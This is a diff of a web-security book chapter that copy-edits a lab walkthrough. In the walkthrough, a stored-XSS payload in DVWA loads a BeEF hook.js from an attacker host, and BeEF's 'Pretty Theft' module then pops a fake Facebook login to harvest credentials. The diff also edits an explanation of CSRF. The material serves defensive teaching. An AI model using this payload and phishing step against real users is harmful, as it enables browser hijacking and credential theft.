binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter10.md

 G>
 G> Browse to "XSS stored".
 G>
-G> Enter some text in the Name field and some text in the Message field.
+G> Enter some text in the Name and Message fields.
 G>
-G> Enable foxy proxy so that your request goes to the same port that burp suite is going to be listening on.
+G> Enable Foxy Proxy so that your request goes to the same port that Burp Suite is going to be listening on.
 G>
-G> Fire up burp.
+G> Initialise Burp.
 G>
-G> Back in the DVWA send your request by clicking on the Sign Guest-book button.
+G> Back in DVWA, send your request by clicking on the Sign Guest-book button.
 G>
-G> Switch back to burp -> Proxy tab and the request should be waiting for you.
+G> Switch back to the Burp -> Proxy tab and the request should be waiting for you.
 You now need to replace the text you used in the Message field `mtxMessage` with `<script src="http://<BeEF comms server IP address>:3000/hook.js"></script>` and forward the request.
 G>
-G> You can disable FoxyProxy now too.
+G> You can now disable FoxyProxy too.
 G>
-G> Now on your victims machine, the victim can log into DVWA and browse to the same "XSS stored" page.
-Now as the attacker, you will now notice that the BeEF Web UI shows a node with the victims IP address.
+G> Now on your victim's system, the victim can log into DVWA and browse to the same "XSS stored" page.
+Now as the attacker, you will notice that the BeEF Web UI shows a node with the victims IP address.
 This means BeEF has the victims browser hooked.
-The victims browser is now a zombie, continuously polling the BeEF communications server for commands to execute on its behalf.
+The victim's browser is now a zombie, continuously polling the BeEF communications server for commands to execute on its behalf.
 G>
-G> If you open the victims browser developer tools, you will be able to inspect the communications and the JavaScript within the hook.js file.
+G> If you open the victim's browser developer tools, you will be able to inspect the communications and the JavaScript within the hook.js file.
 G>
-G> Back in the BeEF web UI you can explore the modules that you can launch against the victims browser.
-You can view the types of attacks you can carry out on the [BeEF projects wiki](https://github.com/beefproject/beef/wiki/BeEF-modules).
+G> In the BeEF web UI you can explore the modules that you can launch against the victim's browser.
+You can review the types of attacks you can carry out on the [BeEF projects wiki](https://github.com/beefproject/beef/wiki/BeEF-modules).
 G>
-G> If you select the victims node and click on the Commands tab in the BeEF web UI, then in the Module Tree under Social Engineering select the "Pretty Theft" node.
-There are some options to configure, but even selecting the default of Facebook if you know your target is already an avid FB user should work fine.
-You would of course know this if you have done due diligence in the reconnaissance stage.
+G> Select the victim's node and click on the Commands tab in the BeEF web UI, then in the Module Tree under Social Engineering select the "Pretty Theft" node.
+There are some options to configure, but even just selecting the Facebook default, if you know your target is already an avid FB user, should work fine.
+You would, of course, know this if you have done due diligence in the reconnaissance stage.

 {icon=bomb}
-G> Click on the Execute button and on the next request -> response from the hook.js, the victims browser should pop a "Facebook Session Timed Out" modal.
-To get rid of this modal, the victim must enter their credentials and Log-in.
+G> Click on the Execute button and on the next Request -> Response from the hook.js, the victim's browser should pop a "Facebook Session Timed Out" modal.
+To get rid of this modal, the victim must enter their credentials and log in.
 There is no cancel or 'x' button.
 Once the victim has sent their credentials, they will be visible in the Command results of the BeEF web UI.

 ### [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern) {#web-applications-countermeasures-lack-of-input-validation-filtering-and-sanitisation-csrf}
 ![](images/ThreatTags/average-uncommon-easy-moderate.png)

-This type of attack depends on a fraudulent web resource; it could be a website, email, instant message, or program that causes the targets web browser to perform an unintentional action on a website that the target is currently authenticated with.
+This type of attack depends on a fraudulent web resource; it could be a website, email, instant message, or program that causes the target's web browser to perform an unintentional action on a website that the target is currently authenticated with.

-CSRF attacks target functionality that change state on the server (`POST`, `PUT`, `DELETE`) that the target is currently authenticated with.
-Such as requests like changing the targets credentials, making a purchase, moving money at their bank, forcing the target to retrieve data does not help the attacker.
+CSRF attacks target functionality that change state on the server (`POST`, `PUT`, `DELETE`) that the target is currently authenticated to.
+This includes requests such as changing the target's credentials, making a purchase, moving money at their bank, etc. Forcing the target to retrieve data does not typically help the attacker in this scenario.

-If you are using cookies (authentication that the browser automatically sends from the client) for storage of client-side session artefacts, CSRF is your main concern, but XSS is also a possible attack vector.
+If you are using cookies (authentication that the browser automatically sends from the client) for storage of client-side session artifacts, CSRF is your main concern, but XSS is also a possible attack vector.

-The target needs to submit the request either intentionally or unintentionally.
+The target needs to submit the request, either intentionally or unintentionally.
 The request could appear to the target as any action.
 For example:

-1. Intentionally by clicking a button on a website that does not appear to have anything in common with the website that the target is already authenticated with by way of session Id stored in a cookie
+1. Intentionally, by clicking a button on a website that does not appear to have anything in common with the website that the target is already authenticated with by way of Session Id stored in a cookie
-2. Unintentionally by loading a page not appearing to have anything in common with the website that the target is already authenticated with by way of session Id stored in a cookie, that for example contains an `<iframe>` with a form and a script block inside
+2. Unintentionally, by loading a page not appearing to have anything in common with the website that the target is already authenticated with by way of Session Id stored in a cookie, that, for example, contains an `<iframe>` with a form and a script block inside

-**For No. 1 above**, the action attribute of the form for which the target submits could be to the website that the target is already authenticated with, thus a fraudulent request is issued from a web page seemingly unrelated to the website that the target is already authenticated with.
+**For No. 1 above**, the action attribute of the form the target submits could be to the website that the target is already authenticated with, thus a fraudulent request is issued from a web page seemingly unrelated to the website that the target is already authenticated with.
 This can be seen in the second example below on line 4.
 The browser plays its part and sends the session Id stored in the cookie.
-NodeGoat has an excellent example of how this plays out:
+NodeGoat has an excellent example attack step by step:

 Below code can be found at [https://github.com/OWASP/NodeGoat/](https://github.com/OWASP/NodeGoat/blob/b475010f2de3d601eda3ad2498d9e6c729204a09/app/views/profile.html):